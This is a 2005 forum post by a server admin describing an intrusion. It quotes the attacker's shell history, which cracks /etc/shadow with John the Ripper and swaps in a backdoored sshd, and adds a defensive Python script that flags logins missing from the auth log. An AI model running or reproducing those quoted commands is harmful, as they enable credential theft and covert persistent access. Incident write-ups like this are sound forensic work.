Subject: SSH compiled with backdoor


One of my web servers was hacked on July 17, 2005. bash_history:

wget;tar zxvf
john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
../run;./john /etc/shadow
wget;tar -xzf sshd.tar.gz;rm
-rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
cd ../..
./configure --without-x
make install
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart

According to john, a couple of users had weak passwords, but root
seemed well protected. From looking at all the bash_history files, it appears the
hacker came in from the website account and did an su from there.

I found this about a month later when I logged into the box, did an ls,
only to be met by a seg fault. A ps x showed mech.tgz trying to be
downloaded, and a bunch of other CRON processes running. The auth log
didn't show other logins, though, so the ssh they installed must have had
logging turned off for the backdoor.

I filled out an abuse form at geocities for the accounts hosting the
software after downloading the software (I couldn't find the tgz files on
my system).

Last showed:
reboot system boot 2.4.18-bf2.4 Sun Jul 17 18:15
website pts/0 Sun Jul 17 17:42 - down
website pts/1 Sun Jul 17 17:05 - 17:26
website pts/0 Sun Jul 17 16:26 - 17:41

whois says:
inetnum: -
netname: DATANET-RO
descr: Starnets - Datanet
country: RO
address: DATA NET
address: Str. Ioan N. Roman Nr. 13
address: Constanta, cod 900199, ROMANIA

Best Regards,
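As an added example (not part of the original post), this Python script does the cross-check the author did by eye: it lists the pts sessions from `last` that have no matching sshd "Accepted" line in the auth log, which is exactly the gap a replaced sshd with logging switched off leaves behind. The `last` output and auth.log lines below are constructed to mirror the post, and the year 2005 is assumed from the incident date since neither wtmp nor syslog records it.

```python
import re
from datetime import datetime, timedelta

YEAR = 2005  # wtmp and syslog omit the year; assumed from the incident date in the post

# Constructed `last` output, modelled on the lines quoted in the post.
LAST_OUTPUT = """\
reboot   system boot  2.4.18-bf2.4     Sun Jul 17 18:15
website  pts/0                         Sun Jul 17 17:42 - down
website  pts/1                         Sun Jul 17 17:05 - 17:26
website  pts/0                         Sun Jul 17 16:26 - 17:41
"""

# Constructed auth.log: only the 16:26 session was recorded by a stock sshd.
AUTH_LOG = """\
Jul 17 16:26:03 web sshd[2101]: Accepted password for website from 192.0.2.10 port 40122 ssh2
Jul 17 16:26:03 web sshd[2101]: pam_unix(sshd:session): session opened for user website by (uid=0)
"""

# user, pseudo-terminal and "Mon DD HH:MM" login time; reboot and console tty rows do not match
LAST_RE = re.compile(r"^(\S+)\s+(pts/\d+)\s+.*?(\w{3} \d{1,2} \d{2}:\d{2})")
# "Mon DD HH:MM" and user from an sshd "Accepted <method> for <user> from ..." line
ACCEPT_RE = re.compile(r"^(\w{3} \d{1,2} \d{2}:\d{2}):\d{2} \S+ sshd\[\d+\]: Accepted \S+ for (\S+) from")

def _ts(stamp):
    """'Jul 17 16:26' -> datetime in the incident year."""
    return datetime.strptime(f"{YEAR} {stamp}", "%Y %b %d %H:%M")

def accepted_logins(auth_text):
    """(user, login time) for every session sshd itself logged as accepted."""
    return [(m.group(2), _ts(m.group(1)))
            for m in map(ACCEPT_RE.match, auth_text.splitlines()) if m]

def unlogged_sessions(last_text, auth_text, slack_minutes=1):
    """wtmp pts sessions with no sshd 'Accepted' record for that user within slack_minutes."""
    accepted = accepted_logins(auth_text)
    slack = timedelta(minutes=slack_minutes)  # `last` prints minutes only
    missing = []
    for m in filter(None, map(LAST_RE.match, last_text.splitlines())):
        user, tty, stamp = m.groups()
        when = _ts(stamp)
        if not any(u == user and abs(t - when) <= slack for u, t in accepted):
            missing.append((user, tty, stamp))
    return missing

for user, tty, stamp in unlogged_sessions(LAST_OUTPUT, AUTH_LOG):
    print(f"{user} on {tty} at {stamp}: in wtmp but no sshd 'Accepted' record")
```

Console logins on tty* and terminals opened by screen or su legitimately have no sshd line, so the check is limited to pts entries and each hit still needs a look at what opened the terminal.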